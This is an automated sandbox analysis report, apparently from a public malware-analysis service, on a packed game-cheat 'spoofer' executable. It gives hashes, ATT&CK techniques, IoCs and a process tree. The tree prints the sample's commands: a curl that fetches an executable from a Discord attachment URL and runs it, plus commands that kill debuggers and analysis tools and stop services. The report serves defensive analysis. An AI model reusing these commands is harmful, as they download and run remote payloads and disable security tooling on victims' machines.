3706ed1a2a7e708ee1f495eafe95c03ef9d589850546ffe792a750d7498a45b6

Resubmissions

27-05-2023 17:37

230527-v7b6csce89 8

27-05-2023 17:36

27-05-2023 17:33

27-05-2023 17:32

27-05-2023 17:31

27-05-2023 17:20

27-05-2023 17:11

Analysis

max time kernel
732s
max time network
733s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
27-05-2023 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BW-Spoofer.exe
Size

5.6MB
MD5

67451b7db8bdcd28e6bd16a928794c6c
SHA1

c4e5685ecbe6793267f49ab72a0189fb5f35744a
SHA256

3706ed1a2a7e708ee1f495eafe95c03ef9d589850546ffe792a750d7498a45b6
SHA512

16d8134b87a6b26055f0628da186d842e46a19df83387b3b7272187cefdb1efe86286dd027da181a42dbd9edfbb5a77fcdce561af61be071c337810b117c392a
SSDEEP

98304:qeVN/VSp6wcY7hXQBkAZu+nBx21QNAz2rY6WQU9hUD69748C:q6m6GukCb21F2Vp6dtC

Score

8^/10

evasion persistence vmprotect

Malware Config

Signatures

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
2092	BW_Overlay_Handler.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/3968-135-0x00007FF6F5FE0000-0x00007FF6F69AD000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3968	BW-Spoofer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Media\BW_Overlay_Handler.exe	curl.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4332	sc.exe
3328	sc.exe
1676	sc.exe
2260	sc.exe
3852	sc.exe
4928	sc.exe
3312	Process not Found
2336	sc.exe
4480	sc.exe
2720	sc.exe
2368	sc.exe
4260	sc.exe
3300	sc.exe
3888	Process not Found
1048	sc.exe
2608	sc.exe
4576	sc.exe
4392	Process not Found
1828	sc.exe
3296	sc.exe
1172	sc.exe
212	sc.exe
212	sc.exe
4920	sc.exe
5004	sc.exe
4264	sc.exe
3124	Process not Found
1368	sc.exe
824	sc.exe
1608	sc.exe
3052	sc.exe
3868	Process not Found
4904	sc.exe
4252	sc.exe
3336	sc.exe
1428	sc.exe
496	sc.exe
4924	sc.exe
4192	sc.exe
2720	sc.exe
3388	sc.exe
1500	sc.exe
2476	sc.exe
3120	sc.exe
2404	sc.exe
4936	sc.exe
1172	sc.exe
3300	sc.exe
2168	Process not Found
3872	Process not Found
4252	sc.exe
3472	sc.exe
1564	sc.exe
1344	sc.exe
544	Process not Found
496	sc.exe
772	sc.exe
824	sc.exe
4432	Process not Found
1068	Process not Found
4316	sc.exe
4064	sc.exe
1612	sc.exe
1876	sc.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
4192	taskkill.exe
3904	taskkill.exe
3676	taskkill.exe
1568	taskkill.exe
3312	taskkill.exe
5044	taskkill.exe
3676	taskkill.exe
636	taskkill.exe
3852	taskkill.exe
3808	taskkill.exe
3260	taskkill.exe
4144	taskkill.exe
4616	Process not Found
5080	taskkill.exe
2380	taskkill.exe
4908	taskkill.exe
2372	taskkill.exe
3084	Process not Found
3104	Process not Found
2920	taskkill.exe
1172	taskkill.exe
2088	taskkill.exe
8	taskkill.exe
3260	Process not Found
728	taskkill.exe
4332	taskkill.exe
4788	taskkill.exe
116	taskkill.exe
2168	taskkill.exe
1208	Process not Found
2260	taskkill.exe
1056	taskkill.exe
4144	taskkill.exe
4432	taskkill.exe
3736	Process not Found
452	taskkill.exe
1356	taskkill.exe
680	taskkill.exe
4776	taskkill.exe
1472	Process not Found
400	taskkill.exe
1540	taskkill.exe
4996	taskkill.exe
396	taskkill.exe
4316	taskkill.exe
1972	taskkill.exe
4508	taskkill.exe
1488	taskkill.exe
2204	taskkill.exe
4976	taskkill.exe
4412	taskkill.exe
4124	taskkill.exe
396	taskkill.exe
4204	taskkill.exe
2184	taskkill.exe
884	taskkill.exe
984	Process not Found
1480	Process not Found
4316	taskkill.exe
984	taskkill.exe
4112	taskkill.exe
4748	taskkill.exe
2184	taskkill.exe
4980	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133296898955464486"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{BFF7D80C-91EE-4F71-AE1B-740618A0B1CF}	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3968	BW-Spoofer.exe
3968	BW-Spoofer.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4980	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	544	taskkill.exe
Token: SeDebugPrivilege	3036	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	3100	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	2784	taskmgr.exe
Token: SeSystemProfilePrivilege	2784	taskmgr.exe
Token: SeCreateGlobalPrivilege	2784	taskmgr.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	464	cmd.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1172	sc.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	3856	cmd.exe
Token: SeDebugPrivilege	1492	cmd.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	728	cmd.exe
Token: SeDebugPrivilege	4504	TrustedInstaller.exe
Token: SeDebugPrivilege	2336	sc.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	3024	cmd.exe
Token: SeDebugPrivilege	3204	cmd.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	3316	taskkill.exe
Token: SeDebugPrivilege	4668	Process not Found
Token: SeDebugPrivilege	4888	cmd.exe
Token: SeDebugPrivilege	4596	taskkill.exe
Token: SeDebugPrivilege	1608	cmd.exe
Token: SeDebugPrivilege	4392	Process not Found
Token: SeDebugPrivilege	1540	cmd.exe
Token: SeDebugPrivilege	2380	cmd.exe
Token: SeDebugPrivilege	4108	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	4828	cmd.exe
Token: SeDebugPrivilege	1228	cmd.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	3296	sc.exe
Token: SeDebugPrivilege	4532	cmd.exe
Token: SeDebugPrivilege	464	cmd.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	4088	Process not Found
Token: SeDebugPrivilege	2188	cmd.exe
Token: SeDebugPrivilege	4664	taskkill.exe
Token: SeDebugPrivilege	4112	taskkill.exe
Token: SeDebugPrivilege	3804	cmd.exe
Token: SeDebugPrivilege	1440	Process not Found
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	2496	cmd.exe
Token: SeDebugPrivilege	3596	Process not Found
Token: SeDebugPrivilege	4508	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	taskmgr.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe
2784	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3968 wrote to memory of 2188	3968	BW-Spoofer.exe	86
PID 3968 wrote to memory of 2188	3968	BW-Spoofer.exe	86
PID 2188 wrote to memory of 684	2188	cmd.exe	87
PID 2188 wrote to memory of 684	2188	cmd.exe	87
PID 3968 wrote to memory of 1268	3968	BW-Spoofer.exe	88
PID 3968 wrote to memory of 1268	3968	BW-Spoofer.exe	88
PID 1268 wrote to memory of 2092	1268	cmd.exe	89
PID 1268 wrote to memory of 2092	1268	cmd.exe	89
PID 3968 wrote to memory of 2608	3968	BW-Spoofer.exe	91
PID 3968 wrote to memory of 2608	3968	BW-Spoofer.exe	91
PID 2608 wrote to memory of 1500	2608	cmd.exe	92
PID 2608 wrote to memory of 1500	2608	cmd.exe	92
PID 2608 wrote to memory of 1340	2608	cmd.exe	93
PID 2608 wrote to memory of 1340	2608	cmd.exe	93
PID 2608 wrote to memory of 3928	2608	cmd.exe	94
PID 2608 wrote to memory of 3928	2608	cmd.exe	94
PID 3968 wrote to memory of 220	3968	BW-Spoofer.exe	95
PID 3968 wrote to memory of 220	3968	BW-Spoofer.exe	95
PID 3968 wrote to memory of 3792	3968	BW-Spoofer.exe	96
PID 3968 wrote to memory of 3792	3968	BW-Spoofer.exe	96
PID 3968 wrote to memory of 1424	3968	BW-Spoofer.exe	97
PID 3968 wrote to memory of 1424	3968	BW-Spoofer.exe	97
PID 3968 wrote to memory of 4060	3968	BW-Spoofer.exe	98
PID 3968 wrote to memory of 4060	3968	BW-Spoofer.exe	98
PID 3968 wrote to memory of 4952	3968	BW-Spoofer.exe	99
PID 3968 wrote to memory of 4952	3968	BW-Spoofer.exe	99
PID 3968 wrote to memory of 4800	3968	BW-Spoofer.exe	100
PID 3968 wrote to memory of 4800	3968	BW-Spoofer.exe	100
PID 3968 wrote to memory of 2732	3968	BW-Spoofer.exe	101
PID 3968 wrote to memory of 2732	3968	BW-Spoofer.exe	101
PID 3968 wrote to memory of 664	3968	BW-Spoofer.exe	105
PID 3968 wrote to memory of 664	3968	BW-Spoofer.exe	105
PID 3968 wrote to memory of 3836	3968	BW-Spoofer.exe	102
PID 3968 wrote to memory of 3836	3968	BW-Spoofer.exe	102
PID 2732 wrote to memory of 4476	2732	cmd.exe	104
PID 2732 wrote to memory of 4476	2732	cmd.exe	104
PID 664 wrote to memory of 752	664	cmd.exe	103
PID 664 wrote to memory of 752	664	cmd.exe	103
PID 3968 wrote to memory of 3964	3968	BW-Spoofer.exe	106
PID 3968 wrote to memory of 3964	3968	BW-Spoofer.exe	106
PID 3968 wrote to memory of 3596	3968	BW-Spoofer.exe	107
PID 3968 wrote to memory of 3596	3968	BW-Spoofer.exe	107
PID 3964 wrote to memory of 4564	3964	cmd.exe	108
PID 3964 wrote to memory of 4564	3964	cmd.exe	108
PID 3596 wrote to memory of 3868	3596	cmd.exe	109
PID 3596 wrote to memory of 3868	3596	cmd.exe	109
PID 3968 wrote to memory of 3316	3968	BW-Spoofer.exe	174
PID 3968 wrote to memory of 3316	3968	BW-Spoofer.exe	174
PID 3968 wrote to memory of 4896	3968	BW-Spoofer.exe	111
PID 3968 wrote to memory of 4896	3968	BW-Spoofer.exe	111
PID 3316 wrote to memory of 2920	3316	taskkill.exe	112
PID 3316 wrote to memory of 2920	3316	taskkill.exe	112
PID 4896 wrote to memory of 544	4896	cmd.exe	113
PID 4896 wrote to memory of 544	4896	cmd.exe	113
PID 3968 wrote to memory of 3044	3968	BW-Spoofer.exe	114
PID 3968 wrote to memory of 3044	3968	BW-Spoofer.exe	114
PID 3044 wrote to memory of 3036	3044	cmd.exe	115
PID 3044 wrote to memory of 3036	3044	cmd.exe	115
PID 3968 wrote to memory of 4888	3968	BW-Spoofer.exe	245
PID 3968 wrote to memory of 4888	3968	BW-Spoofer.exe	245
PID 4888 wrote to memory of 4508	4888	cmd.exe	305
PID 4888 wrote to memory of 4508	4888	cmd.exe	305
PID 3968 wrote to memory of 4596	3968	BW-Spoofer.exe	180
PID 3968 wrote to memory of 4596	3968	BW-Spoofer.exe	180

C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1079064322992504864/1106278594893844601/BW_Redirect_Loader.exe --output C:\Windows\Media\BW_Overlay_Handler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1079064322992504864/1106278594893844601/BW_Redirect_Loader.exe --output C:\Windows\Media\BW_Overlay_Handler.exe
    3⤵
    - Drops file in Windows directory
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Windows\Media\BW_Overlay_Handler.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\Media\BW_Overlay_Handler.exe
    C:\Windows\Media\BW_Overlay_Handler.exe
    3⤵
    - Executes dropped EXE
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe" MD5
    3⤵
    PID:1500
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:1340
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:3792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4188
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4904
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:784
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2592
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:5076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1444
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1472
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2260
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2404
- C:\Windows\system32\cmd.exe
